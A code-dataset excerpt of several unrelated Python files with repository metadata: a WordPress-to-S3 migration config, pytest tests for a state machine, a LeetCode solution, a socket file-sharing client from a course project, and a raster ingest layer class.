response = apiClient.do_action_with_exception(request)
print(response)
except ServerException as e:
print(e)
except ClientException as e:
print(e) | 35.107143 | 84 | 0.811801 | 112 | 983 | 7.044643 | 0.535714 | 0.050697 | 0.050697 | 0.073511 | 0.207858 | 0.114068 | 0 | 0 | 0 | 0 | 0 | 0.019101 | 0.094608 | 983 | 28 | 85 | 35.107143 | 0.867416 | 0.299084 | 0 | 0.125 | 0 | 0 | 0.141593 | 0.039823 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.1875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ea16b9669c920b19a570aba76fefeba84415d6c | 1,564 | py | Python | run.py | jasonmar/wp2s3.py | 7ff00eb12409923978a4e07230b7259ecfe25ddc | [
"Apache-2.0"
] | 1 | 2018-11-09T19:50:13.000Z | 2018-11-09T19:50:13.000Z | run.py | jasonmar/wp2s3.py | 7ff00eb12409923978a4e07230b7259ecfe25ddc | [
"Apache-2.0"
] | null | null | null | run.py | jasonmar/wp2s3.py | 7ff00eb12409923978a4e07230b7259ecfe25ddc | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) 2015 Jason Mar
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import wp2s3

# Copy the library defaults instead of aliasing them: the original code
# did `kwargs = wp2s3.default_kwargs` and then mutated that shared
# module-level dict in place via kwargs.update().
kwargs = dict(wp2s3.default_kwargs)

# Edit the lines below with the specifics of your Wordpress account
myargs = {
    "wp_uri": 'https://blogname.wordpress.com/xmlrpc.php',
    "wp_user": 'user@wordpress.com',
    "wp_pass": 'password',
    "wp_db": 'wp.sqlite3',
    "wp_host": 'blogname.files.wordpress.com',
    "s3_host": 's3-us-west-2.amazonaws.com',
    "s3_bucket": 'blogname',
    "wp_upload_dir": r'C:\tmp\wp-upload',
    "state": {  # Edit state if you need to skip certain steps
        "metadata_loaded": False,    # False => fetch all media items and save to sqlite database
        "media_downloaded": False,   # False => download all media items using links in database
        "media_uploaded": False,     # False => upload all files from wp_upload_dir to s3 bucket
        "posts_edited": False        # False => fetch all posts, replace wp_host with s3_host/s3_bucket, and apply changes
    }
}

kwargs.update(myargs)
wp2s3.perform_migration(kwargs)
# EOF | 36.372093 | 116 | 0.704604 | 229 | 1,564 | 4.724891 | 0.567686 | 0.055453 | 0.02403 | 0.029575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017419 | 0.192455 | 1,564 | 43 | 117 | 36.372093 | 0.839272 | 0.590793 | 0 | 0 | 0 | 0 | 0.450567 | 0.08752 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.05 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ea31af3452ac5977baccd33685b8b5716d9de5e | 11,654 | py | Python | tests/test_state.py | simonsobs/nextline | 94741b85002008cd84b7094a622ff03d18ecef5c | [
"MIT"
] | null | null | null | tests/test_state.py | simonsobs/nextline | 94741b85002008cd84b7094a622ff03d18ecef5c | [
"MIT"
] | 10 | 2021-05-05T14:51:04.000Z | 2022-03-03T19:42:37.000Z | tests/test_state.py | simonsobs/nextline | 94741b85002008cd84b7094a622ff03d18ecef5c | [
"MIT"
] | null | null | null | import time
from abc import ABC, abstractmethod
import pytest
from unittest.mock import Mock
from nextline.registry import PdbCIRegistry
from nextline.utils import Registry
from nextline.state import (
Initialized,
Running,
Exited,
Finished,
Closed,
StateObsoleteError,
StateMethodError
)
##__________________________________________________________________||
# Script that sleeps briefly: a normal run that takes a little time.
SOURCE_ONE = """
import time
time.sleep(0.1)
""".strip()

# Trivial script: used by statements_for_test_reset to swap in a new statement.
SOURCE_TWO = """
x = 2
""".strip()

# Script that raises: exercises exception()/result() on the Finished state.
SOURCE_RAISE = """
raise Exception('foo', 'bar')
""".strip()
##__________________________________________________________________||
@pytest.fixture(autouse=True)
def monkey_patch_trace(monkeypatch):
    """Replace nextline.state.Trace with a mock class for every test."""
    instance = Mock()
    instance.return_value = None
    instance.pdb_ci_registry = Mock(spec=PdbCIRegistry)
    trace_class = Mock(return_value=instance)
    monkeypatch.setattr('nextline.state.Trace', trace_class)
    yield trace_class
@pytest.fixture(autouse=True)
async def wrap_registry(monkeypatch):
    """Replace nextline.state.Registry with a factory producing mocks
    that wrap real Registry instances."""
    factory = Mock(side_effect=lambda: Mock(wraps=Registry()))
    monkeypatch.setattr('nextline.state.Registry', factory)
    yield
##__________________________________________________________________||
class BaseTestState(ABC):
    """Shared fixtures and default tests for every state class.

    Subclasses set ``state_class`` and override the abstract ``state``
    fixture to yield an instance of the state under test.  The default
    tests assert that transitions invalid for that state raise
    StateMethodError; subclasses override the tests that are valid.
    """

    @pytest.fixture()
    def statement(self):
        # the script executed by the state machine under test
        yield SOURCE_ONE

    @pytest.fixture()
    async def initialized(self, statement):
        # Fresh Initialized state; closed on teardown unless the test
        # already made it obsolete by transitioning away.
        y = Initialized(statement)
        yield y
        if y.is_obsolete():
            return
        await y.close()

    @pytest.fixture()
    async def running(self, initialized):
        y = initialized.run()
        yield y
        # drive the machine to completion so teardown leaves nothing running
        if y.is_obsolete():
            return
        exited = await y.exited()
        if exited.is_obsolete():
            return
        finished = await exited.finish()
        await finished.close()

    @pytest.fixture()
    async def exited(self, running):
        y = await running.exited()
        yield y
        if y.is_obsolete():
            return
        finished = await y.finish()
        await finished.close()

    @pytest.fixture()
    async def finished(self, exited):
        y = await exited.finish()
        yield y
        if y.is_obsolete():
            return
        await y.close()

    @pytest.fixture()
    async def closed(self, finished):
        y = await finished.close()
        yield y

    @abstractmethod
    def state(self, *_, **__):
        # overridden in subclasses as a fixture yielding the state under test
        pass

    # parametrization for reset(): either a new statement or None (keep old)
    params = (pytest.param(SOURCE_TWO, id="SOURCE_TWO"), None)

    @pytest.fixture(params=params)
    def statements_for_test_reset(self, statement, request):
        # yields (expected statement after reset, argument passed to reset)
        old_statement = statement
        statement = request.param
        if statement:
            expected_statement = statement
        else:
            expected_statement = old_statement
        yield (expected_statement, statement)

    def test_state(self, state):
        """The fixture yields the expected class and is not obsolete."""
        assert isinstance(state, self.state_class)
        assert 'obsolete' not in repr(state)

    async def assert_obsolete(self, state):
        """Assert every transition on an obsolete state raises."""
        assert 'obsolete' in repr(state)
        with pytest.raises(StateObsoleteError):
            state.run()
        with pytest.raises(StateObsoleteError):
            await state.exited()
        with pytest.raises(StateObsoleteError):
            await state.finish()
        with pytest.raises(StateObsoleteError):
            state.reset()
        with pytest.raises(StateObsoleteError):
            await state.close()

    # The default tests below assert each transition is *invalid* for the
    # state; subclasses override the ones that are valid.

    def test_run(self, state):
        with pytest.raises(StateMethodError):
            state.run()

    @pytest.mark.asyncio
    async def test_exited(self, state):
        with pytest.raises(StateMethodError):
            await state.exited()

    @pytest.mark.asyncio
    async def test_finish(self, state):
        with pytest.raises(StateMethodError):
            await state.finish()

    @pytest.mark.asyncio
    async def test_reset(self, state, statements_for_test_reset):
        _t, statement = statements_for_test_reset
        with pytest.raises(StateMethodError):
            state.reset(statement=statement)

    def test_send_pdb_command(self, state):
        thread_asynctask_id = (1, None)
        command = 'next'
        with pytest.raises(StateMethodError):
            state.send_pdb_command(thread_asynctask_id, command)

    def test_exception(self, state):
        with pytest.raises(StateMethodError):
            state.exception()

    def test_result(self, state):
        with pytest.raises(StateMethodError):
            state.result()
class TestInitialized(BaseTestState):
    """Transitions valid on the Initialized state."""

    state_class = Initialized

    @pytest.fixture()
    def state(self, initialized):
        yield initialized

    @pytest.mark.asyncio
    async def test_run(self, state):
        next_state = state.run()
        assert isinstance(next_state, Running)
        await self.assert_obsolete(state)

    @pytest.mark.asyncio
    async def test_reset(self, state, statements_for_test_reset):
        expected, new_statement = statements_for_test_reset
        fresh = state.reset(statement=new_statement)
        assert isinstance(fresh, Initialized)
        assert expected == fresh.registry.get('statement')
        # reset() yields a new object but keeps the same registry
        assert fresh is not state
        assert fresh.registry is state.registry
        await self.assert_obsolete(state)

    @pytest.mark.asyncio
    async def test_close(self, state):
        end_state = await state.close()
        assert isinstance(end_state, Closed)
        await self.assert_obsolete(state)
class TestRunning(BaseTestState):
    """Transitions valid on the Running state."""

    state_class = Running

    @pytest.fixture()
    def state(self, running):
        yield running

    async def assert_obsolete(self, state):
        # Unlike the base version, exited() must remain callable here.
        assert 'obsolete' in repr(state)
        with pytest.raises(StateObsoleteError):
            state.run()
        with pytest.raises(StateObsoleteError):
            await state.finish()
        with pytest.raises(StateObsoleteError):
            state.reset()
        with pytest.raises(StateObsoleteError):
            await state.close()

    @pytest.mark.asyncio
    async def test_exited(self, state):
        # exited() is idempotent: repeated calls return the same object
        first = await state.exited()
        assert isinstance(first, Exited)
        assert first is await state.exited()
        assert first is await state.exited()
        await self.assert_obsolete(state)

    def test_send_pdb_command(self, state):
        # sending pdb commands is legal while running, so no error expected
        pass
class TestExited(BaseTestState):
    """Transitions valid on the Exited state."""

    state_class = Exited

    @pytest.fixture()
    def state(self, exited):
        yield exited

    @pytest.mark.asyncio
    async def test_finish(self, state):
        next_state = await state.finish()
        assert isinstance(next_state, Finished)
        await self.assert_obsolete(state)
class TestFinished(BaseTestState):
    """Transitions valid on the Finished state."""

    state_class = Finished

    @pytest.fixture()
    def state(self, finished):
        yield finished

    @pytest.mark.asyncio
    async def test_finish(self, state):
        # finish() is idempotent and does not obsolete the state
        for _ in range(3):
            assert state is await state.finish()
        assert 'obsolete' not in repr(state)

    @pytest.mark.asyncio
    async def test_reset(self, state, statements_for_test_reset):
        expected, new_statement = statements_for_test_reset
        fresh = state.reset(statement=new_statement)
        assert isinstance(fresh, Initialized)
        assert expected == fresh.registry.get('statement')
        assert fresh.registry is state.registry
        await self.assert_obsolete(state)

    @pytest.mark.asyncio
    async def test_close(self, state):
        end_state = await state.close()
        assert isinstance(end_state, Closed)
        await self.assert_obsolete(state)

    @pytest.mark.asyncio
    async def test_exception(self, state):
        # a normal run stores no exception
        assert state.exception() is None

    @pytest.mark.asyncio
    async def test_result(self, state):
        assert state.result() is None

    @pytest.mark.asyncio
    async def test_exception_raise(self):
        # a raising script ends Finished with the exception captured
        state = Initialized(SOURCE_RAISE)
        state = state.run()
        state = await state.exited()
        state = await state.finish()
        assert isinstance(state, Finished)
        captured = state.exception()
        assert isinstance(captured, Exception)
        assert ('foo', 'bar') == captured.args
        with pytest.raises(Exception):
            raise state.exception()

    @pytest.mark.asyncio
    async def test_result_raise(self):
        # result() re-raises the captured exception
        state = Initialized(SOURCE_RAISE)
        state = state.run()
        state = await state.exited()
        state = await state.finish()
        assert isinstance(state, Finished)
        with pytest.raises(Exception):
            state.result()
class TestClosed(BaseTestState):
    """Transitions valid on the Closed state."""

    state_class = Closed

    @pytest.fixture()
    def state(self, closed):
        yield closed

    @pytest.mark.asyncio
    async def test_reset(self, state, statements_for_test_reset):
        expected, new_statement = statements_for_test_reset
        fresh = state.reset(statement=new_statement)
        assert isinstance(fresh, Initialized)
        assert expected == fresh.registry.get('statement')
        # resetting a closed state starts over with a brand-new registry
        assert fresh.registry is not state.registry
        await self.assert_obsolete(state)

    @pytest.mark.asyncio
    async def test_close(self, state):
        # close() is idempotent and does not obsolete the state
        for _ in range(3):
            assert state is await state.close()
        assert 'obsolete' not in repr(state)
##__________________________________________________________________||
@pytest.mark.asyncio
async def test_transition():
    """Walk the state machine through its full life cycle."""
    state = Initialized(SOURCE_ONE)
    assert isinstance(state, Initialized)
    state = state.run()
    assert isinstance(state, Running)
    # the remaining transitions are all awaitable, zero-argument methods
    for method_name, expected_class in (
            ('exited', Exited), ('finish', Finished), ('close', Closed)):
        state = await getattr(state, method_name)()
        assert isinstance(state, expected_class)
@pytest.mark.asyncio
async def test_register_state_name():
    """Each transition registers its state name in the registry."""
    state = Initialized(SOURCE_ONE)
    state = state.run()
    state = await state.exited()
    state = await state.finish()
    state = await state.close()
    recorded = [
        c.args[1]
        for c in state.registry.register.call_args_list
        if c.args[0] == 'state_name'
    ]
    assert ['initialized', 'running', 'exited', 'finished', 'closed'] == recorded
@pytest.mark.asyncio
async def test_register_state_name_reset():
    """State names are re-registered across reset(); resetting after
    close() starts over with a fresh registry."""

    def registered_state_names(state):
        # Collect every 'state_name' value registered so far, in order.
        # (Extracted: the original repeated this comprehension three times.)
        return [c.args[1]
                for c in state.registry.register.call_args_list
                if c.args[0] == 'state_name']

    state = Initialized(SOURCE_ONE)
    state = state.reset()
    state = state.run()
    state = await state.exited()
    state = await state.finish()
    state = state.reset()
    state = state.run()
    state = await state.exited()
    state = await state.finish()
    state = await state.close()
    expected = [
        'initialized',
        'initialized', 'running', 'exited', 'finished',
        'initialized', 'running', 'exited', 'finished', 'closed'
    ]
    assert expected == registered_state_names(state)

    # A reset after close() creates a new registry, so only the new
    # cycle's names are recorded.
    state = state.reset()
    state = state.run()
    state = await state.exited()
    state = await state.finish()
    state = await state.close()
    expected = [
        'initialized', 'running', 'exited', 'finished', 'closed'
    ]
    assert expected == registered_state_names(state)
##__________________________________________________________________||
| 27.813842 | 101 | 0.659259 | 1,286 | 11,654 | 5.606532 | 0.096423 | 0.051318 | 0.047157 | 0.061026 | 0.687517 | 0.613454 | 0.593343 | 0.539945 | 0.506103 | 0.476283 | 0 | 0.001136 | 0.244551 | 11,654 | 418 | 102 | 27.880383 | 0.81781 | 0.044105 | 0 | 0.612179 | 0 | 0 | 0.034517 | 0.002067 | 0 | 0 | 0 | 0 | 0.169872 | 1 | 0.048077 | false | 0.00641 | 0.025641 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ea4ab72c6095ad5621af4df3773f6f0b18d8cda | 783 | py | Python | 160-intersection-of-two-linked-lists/160-intersection-of-two-linked-lists.py | tlylt/LeetCodeAnki | 9f69504c3762f7895d95c2a592f18ad395199ff4 | [
"MIT"
] | 1 | 2022-02-14T08:03:32.000Z | 2022-02-14T08:03:32.000Z | 160-intersection-of-two-linked-lists/160-intersection-of-two-linked-lists.py | tlylt/LeetCodeAnki | 9f69504c3762f7895d95c2a592f18ad395199ff4 | [
"MIT"
] | null | null | null | 160-intersection-of-two-linked-lists/160-intersection-of-two-linked-lists.py | tlylt/LeetCodeAnki | 9f69504c3762f7895d95c2a592f18ad395199ff4 | [
"MIT"
] | null | null | null | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    """LeetCode 160: find the node where two singly linked lists meet."""

    def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
        # Advance the head of the longer list until both heads are the
        # same distance from the end, then walk them in lockstep.
        len_a = self.findLength(headA)
        len_b = self.findLength(headB)
        for _ in range(len_a - len_b):  # empty range if len_a <= len_b
            headA = headA.next
        for _ in range(len_b - len_a):
            headB = headB.next
        while headA is not None:
            if headA == headB:
                return headA
            headA = headA.next
            headB = headB.next
        return None

    def findLength(self, node):
        # Count the nodes reachable from *node*.
        count = 0
        while node is not None:
            count += 1
            node = node.next
        return count
5ea50b0a6baa34ab53b43f4b399dabbba9754ddb | 12,968 | py | Python | User/user.py | 17kisern/-GVSU-CIS457-Project2 | a2438e2c165a4e5b1381c332f2879122e081ff2d | [
"MIT"
] | null | null | null | User/user.py | 17kisern/-GVSU-CIS457-Project2 | a2438e2c165a4e5b1381c332f2879122e081ff2d | [
"MIT"
] | null | null | null | User/user.py | 17kisern/-GVSU-CIS457-Project2 | a2438e2c165a4e5b1381c332f2879122e081ff2d | [
"MIT"
] | null | null | null | import os
from os import path
import socket # Import socket module
import asyncio
import sys
"""
Notes
==============
socket.gethostname() gets the current machines hostname, for example "DESKTOP-1337PBJ"
string.encode('UTF-8') encodes the given string into a 'bytes' literal object using the UTF-8 standard that is required
bytes.decode("UTF-8") decodes some 'bytes' literal object using the UTF-8 standard that information gets sent over the internet in
all the b'string here' are converting a string into binary format. Hence the B
"""
# True while we hold an open connection to the central server
connected = False
socketObject = socket.socket() # Create a socket object
# Complete "\0"-terminated messages already received but not yet consumed
# by RecvPayload (a recv() burst may carry more than one message)
responseBuffer = []
# Number of bytes requested per socket recv() call
bufferSize = 1024
# host = socket.gethostname()
# host = "localhost" # Get local machine name
# port = 60000 # Reserve a port for your service.
def SendPayload(socketBoi, toSend: str):
    """Send *toSend* on the socket, UTF-8 encoded, with the trailing NUL
    byte that marks end-of-transmission in this protocol."""
    message = toSend + "\0"
    socketBoi.send(message.encode("UTF-8"))
def RecvPayload(socketBoi):
    """Receive one "\\0"-terminated message and return it (terminator
    stripped).

    If an earlier recv() burst carried several messages, the extras were
    cached in the module-level responseBuffer and are served first.
    """
    # Serve a previously buffered message first, if any
    if len(responseBuffer) > 0:
        return responseBuffer.pop(0)
    global bufferSize
    returnString = ""
    reachedEOF = False
    while not reachedEOF:
        # Receiving data in chunks of up to bufferSize bytes
        data = socketBoi.recv(bufferSize)
        if not data:
            # peer closed the connection
            reachedEOF = True
            break
        decodedString = data.decode("UTF-8")
        # Bug fix: the terminator can arrive alone in a 1-byte chunk; the
        # old check required len(decodedString) >= 2 and would then block
        # forever on the next recv().  endswith() handles every length.
        if decodedString.endswith("\0"):
            reachedEOF = True
            decodedString = decodedString[:-1]
        returnString += decodedString
    # A burst may contain multiple responses: split on the EOT notifier
    # (NULL \0) and cache everything in the response buffer.
    response = returnString.split("\0")
    for entry in response:
        responseBuffer.append(entry)
    # Return the first buffered response, removing it from the buffer
    return responseBuffer.pop(0)
# Connect to a central server
def Connect(address, port: int, usernameOverride=""):
global connected
global socketObject
global bufferSize
try:
socketObject.connect((address, int(port)))
# data = socketObject.recv(bufferSize)
# connectionStatus = data.decode("UTF-8")
connectionStatus = RecvPayload(socketObject)
# Make sure we were accepted (server hasn't hit limit)
if(int(connectionStatus) != 200):
print("Connection Refused")
raise ConnectionRefusedError
else:
print("Connection Accepted")
print("\nSuccessfully connected to [", address, ":", int(port), "]")
usernameAccepted = False
while(not usernameAccepted):
if(usernameOverride == ""):
username = input("Username: ")
else:
username = usernameOverride
SendPayload(socketObject, username)
response = RecvPayload(socketObject)
if(response == "200"):
usernameAccepted = True
break
else:
print("Username not accepted. Please try another")
hostNameAccepted = False
while(not hostNameAccepted):
hostname = socket.gethostname()
SendPayload(socketObject, hostname)
response = RecvPayload(socketObject)
if(response == "200"):
hostNameAccepted = True
break
connectionSpeedAccepted = False
while(not connectionSpeedAccepted):
connectionSpeed = input("Connection Speed: ")
SendPayload(socketObject, connectionSpeed)
response = RecvPayload(socketObject)
if(response == "200"):
hostNameAccepted = True
break
connected = True
except ConnectionRefusedError:
print("\Server has reached it's user capacity. Please try again later.")
socketObject = socket.socket()
connected = False
except:
print("\nFailed to connect to [", address, ":", int(port), "]\nPlease Try Again")
socketObject = socket.socket()
connected = False
def ConnectGUI(address, port: int, usernameOverride=""):
global connected
if connected:
Disconnect(["connect", address, port])
Connect(address, port, usernameOverride)
if(connected):
RefreshServer()
print("\nReady to interact with Server")
else:
Connect(address, port, usernameOverride)
if(connected):
RefreshServer()
print("\nReady to interact with Server")
# Disconnect from the central server
def Disconnect(commandArgs):
    """Send the disconnect command, close the socket, and replace it with
    a fresh one so Connect() can be called again."""
    global connected
    global socketObject
    try:
        SendPayload(socketObject, " ".join(commandArgs))
        socketObject.close()
        socketObject = socket.socket()
        print("Successfully disconnected")
        connected = False
    except Exception:
        # Bug fix: was a bare except, which also swallowed KeyboardInterrupt
        print("Failed to disconnect! Please try again")
    return
# Ask server for available files
def List(commandArgs):
    """Send a LIST/SEARCH command and print the server's response.

    The server streams chunks which we acknowledge with "201"; a payload
    of "205" (or an empty payload) marks the end of the listing.
    """
    global socketObject
    SendPayload(socketObject, " ".join(commandArgs))
    listOutput = ""
    while True:
        data = RecvPayload(socketObject)
        # A numeric payload of 205 signals end of transmission
        try:
            responseCode = int(data)
        except ValueError:
            responseCode = 0
        if not data or responseCode == 205:
            break
        listOutput += data
        # Acknowledge receipt so the server sends the next chunk
        SendPayload(socketObject, "201")
    print(listOutput)
    return
def Search(commandArgs):
    # SEARCH uses the same streamed-response protocol as LIST, so just
    # delegate to List() with the command args untouched.
    List(commandArgs)
# Send our available files to the central server
def RefreshServer(commandArgs=None):
    """Tell the server about every file in the current directory, asking
    the user for a description of each.

    commandArgs is falsy on the initial connection (the server is already
    expecting our file list); otherwise the command is sent first.
    Bug fix: the default was a mutable [] — None behaves identically
    under the truth test below and avoids the shared-default pitfall.
    """
    if commandArgs:
        SendPayload(socketObject, " ".join(commandArgs))
    print("\nPlease give descriptions for all files in the current directory, one file at a time")
    # Gather descriptions for each file we have, and tell the server about them
    for fileFound in os.listdir("."):
        responseCode = 0
        # Keep looping as long as the server hasn't confirmed this file
        while responseCode != 201:
            # Ask user for file description; 301 means the server wants a retry
            if responseCode == 301:
                descriptionPrompt = "".join(["Something went wrong on the server. Please try again.\n", "Description [", fileFound, "]: "])
            else:
                descriptionPrompt = "".join(["Description [", fileFound, "]: "])
            fileDescription = input(descriptionPrompt)
            payload = "|".join([fileFound, fileDescription])
            # Send that info to the server
            SendPayload(socketObject, payload)
            # Wait for the server's acceptance code (success or failure)
            response = RecvPayload(socketObject)
            try:
                responseCode = int(response)
            except ValueError:
                print("Errored out with response/Code:", response)
    # Tell the server we're done
    SendPayload(socketObject, "205")
# Ask server to retrieve a requested file
def Retrieve(commandArgs):
    """Download the file named in commandArgs[1] from the server and save
    it under the same name in the current directory."""
    global socketObject
    global bufferSize
    SendPayload(socketObject, " ".join(commandArgs))
    # First listen for a status code: 300 = no such file, 200 = OK
    statusCode = RecvPayload(socketObject)
    if int(statusCode) == 300:
        print("File does not exist")
        return
    if int(statusCode) != 200:
        print("Error in downloading file")
        return
    # Prepping a fileStream for us to write into
    try:
        receivedFile = open(commandArgs[1], 'wb')
    except OSError:
        print("Error in downloading file")
        return
    # Reading the file in from the server.
    # Bug fixes: the original decoded each chunk as UTF-8 (which breaks
    # on binary files) and wrote the raw chunk INCLUDING the trailing
    # "\0" terminator into the file.  Work on bytes and strip the
    # terminator before writing.
    with receivedFile:
        reachedEOF = False
        while not reachedEOF:
            print('Downloading file from server...')
            data = socketObject.recv(bufferSize)
            if not data:
                break
            if data.endswith(b"\0"):
                reachedEOF = True
                data = data[:-1]
            receivedFile.write(data)
    print("Successfully downloaded and saved: ", commandArgs[1])
    return
# Send a requested file
def Store(commandArgs):
    """Upload the file named in commandArgs[1] to the server in
    bufferSize-byte chunks, then send the "205" end-of-transmission mark."""
    global socketObject
    global bufferSize
    fileName = commandArgs[1]
    # Open the file first so we never announce a transfer we cannot make
    try:
        fileItself = open(fileName, "rb")
    except OSError:
        print("Failed to open file: ", fileName)
        return
    SendPayload(socketObject, " ".join(commandArgs))
    # Stream the file in fixed-size chunks; 'with' guarantees the handle
    # is closed even if a send fails part-way.
    with fileItself:
        fileInBytes = fileItself.read(bufferSize)
        while fileInBytes:
            socketObject.send(fileInBytes)
            fileInBytes = fileItself.read(bufferSize)
    print("Sent: ", commandArgs[1])
    # Let the client know we're done sending the file
    SendPayload(socketObject, "205")
    return
# Shutdown the server
def Shutdown_Server(commandArgs):
    """Forward the shutdown command text to the server verbatim."""
    # NOTE(review): Main() currently routes SHUTDOWN_SERVER through
    # Disconnect() rather than this function — confirm which is intended.
    global socketObject
    SendPayload(socketObject, " ".join(commandArgs))
    return
def Main():
    """Interactive entry point: pick an interface, then run the command loop.

    Only the command-line path ("0") is implemented; any other answer
    just prints "Launching GUI" and falls through without entering the loop.
    """
    global connected
    print("Would you like to operate with command line or GUI?")
    print(" - [0] Command Line")
    print(" - [1] GUI")
    userResponse = input("Interface: ")
    if userResponse == "0":
        print("\nYou have selected Command Line")
    else:
        print("\nLaunching GUI")
    print("\nYou must first connect to a server before issuing any commands.")
    while userResponse == "0":
        print("\n-----------------------------\n")
        userInput = input("Enter Command: ")
        commandArgs = userInput.split()
        # Robustness fix: an empty command line used to raise IndexError
        # on commandArgs[0]; just re-prompt instead.
        if not commandArgs:
            continue
        commandGiven = commandArgs[0].upper()
        if commandGiven == "CONNECT" and len(commandArgs) == 3:
            # The two duplicated connect branches are folded together:
            # drop any existing session, then open the new one.
            if connected:
                Disconnect(commandArgs)
            Connect(commandArgs[1], commandArgs[2])
            if connected:
                RefreshServer()
                print("\nReady to interact with Server")
            continue
        if not connected:
            print("You must first connect to a server before issuing any commands.")
            continue
        if commandGiven == "REFRESH_USER_FILES" and len(commandArgs) == 1:
            RefreshServer(commandArgs)
        elif commandGiven == "LIST" and len(commandArgs) == 1:
            List(commandArgs)
        elif commandGiven == "SEARCH" and len(commandArgs) == 2:
            # SEARCH is routed through List, mirroring the original dispatch.
            List(commandArgs)
        elif commandGiven == "RETRIEVE" and len(commandArgs) == 2:
            Retrieve(commandArgs)
        elif commandGiven == "STORE" and len(commandArgs) == 2:
            Store(commandArgs)
        elif commandGiven == "DISCONNECT" and len(commandArgs) == 1:
            Disconnect(commandArgs)
        elif commandGiven == "QUIT" and len(commandArgs) == 1:
            Disconnect(commandArgs)
            break
        elif commandGiven == "SHUTDOWN_SERVER" and len(commandArgs) == 1:
            # Bug fix (review): this branch previously called Disconnect,
            # leaving Shutdown_Server dead code and never telling the
            # server to stop — confirm intended server-side behavior.
            Shutdown_Server(commandArgs)
            break
        else:
            print("Invalid Command. Please try again.")
Main() | 33.859008 | 140 | 0.589297 | 1,279 | 12,968 | 5.971853 | 0.246286 | 0.039146 | 0.020031 | 0.029851 | 0.298246 | 0.249673 | 0.20686 | 0.191673 | 0.191673 | 0.140875 | 0 | 0.012017 | 0.319787 | 12,968 | 383 | 141 | 33.859008 | 0.853871 | 0.154688 | 0 | 0.526316 | 0 | 0 | 0.127529 | 0.003273 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045113 | false | 0 | 0.018797 | 0 | 0.105263 | 0.116541 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eaa3697b5bd970332387efa36b0b10e0887039a | 2,767 | py | Python | app-tasks/rf/src/rf/ingest/models/layer.py | radiantearth/raster-foundry | 834dc0a1cd4247ffa065ea16fa92760df908760e | [
"Apache-2.0"
] | null | null | null | app-tasks/rf/src/rf/ingest/models/layer.py | radiantearth/raster-foundry | 834dc0a1cd4247ffa065ea16fa92760df908760e | [
"Apache-2.0"
] | 1 | 2017-08-23T17:10:19.000Z | 2017-08-23T21:57:17.000Z | app-tasks/rf/src/rf/ingest/models/layer.py | radiantearth/raster-foundry | 834dc0a1cd4247ffa065ea16fa92760df908760e | [
"Apache-2.0"
] | 3 | 2020-02-05T13:26:31.000Z | 2021-07-24T15:02:02.000Z | """ Python class to represent a layer within an ingest """
class Layer(object):
    """A single layer of an ingest, serializable to an ingest definition."""

    def __init__(self, id, output_uri, sources, cell_size, crs="epsg:3857", pyramid=True, native=False,
                 cell_type="uint16raw", histogram_buckets=512, tile_size=256,
                 resample_method="NearestNeighbor", key_index_method="ZCurveKeyIndexMethod",
                 ingest_resolution_meters=None):
        """
        Create a new ingest Layer

        Args:
            id (str): scene id layer is based on
            output_uri (str): Output layer URI
            sources (list[dict]): list of sources that comprise layer
            cell_size (dict): height and width of cells in layer
            crs (str): Output layer CRS
            pyramid (bool): Whether or not to pyramid
            native (bool): Whether or not to save native resolution
            cell_type (bool): Output layer cell-type
            histogram_buckets (int): Output histogram bin count
            tile_size (int): Size of output tiles
            resample_method (str): GeoTrellis resample method
            key_index_method (str): GeoTrellis method for indexing keys
            ingest_resolution_meters (float): Optional resolution that will dictate which images
                from the scene are used
        """
        # Identity and inputs
        self.id = id
        self.output_uri = output_uri
        self.sources = sources
        # Geometry
        self.cell_size = cell_size
        self.tile_size = tile_size
        self.output_tile_size = tile_size
        self.crs = crs
        # Output options
        self.output_pyramid = pyramid
        self.output_native = native
        self.output_cell_type = cell_type
        self.output_histogram_buckets = histogram_buckets
        self.output_resample_method = resample_method
        self.output_key_index_method = key_index_method
        self.ingest_resolution_meters = ingest_resolution_meters

    def to_dict(self):
        """ Return a dict formatted specifically for serialization to an ingest definition component """
        output_section = {
            'uri': self.output_uri,
            'crs': self.crs,
            'cellType': self.output_cell_type,
            'tileSize': self.tile_size,
            'resampleMethod': self.output_resample_method,
            'keyIndexMethod': self.output_key_index_method,
            'histogramBuckets': self.output_histogram_buckets,
            'cell_size': self.cell_size,
            'pyramid': self.output_pyramid,
            'native': self.output_native,
        }
        return {
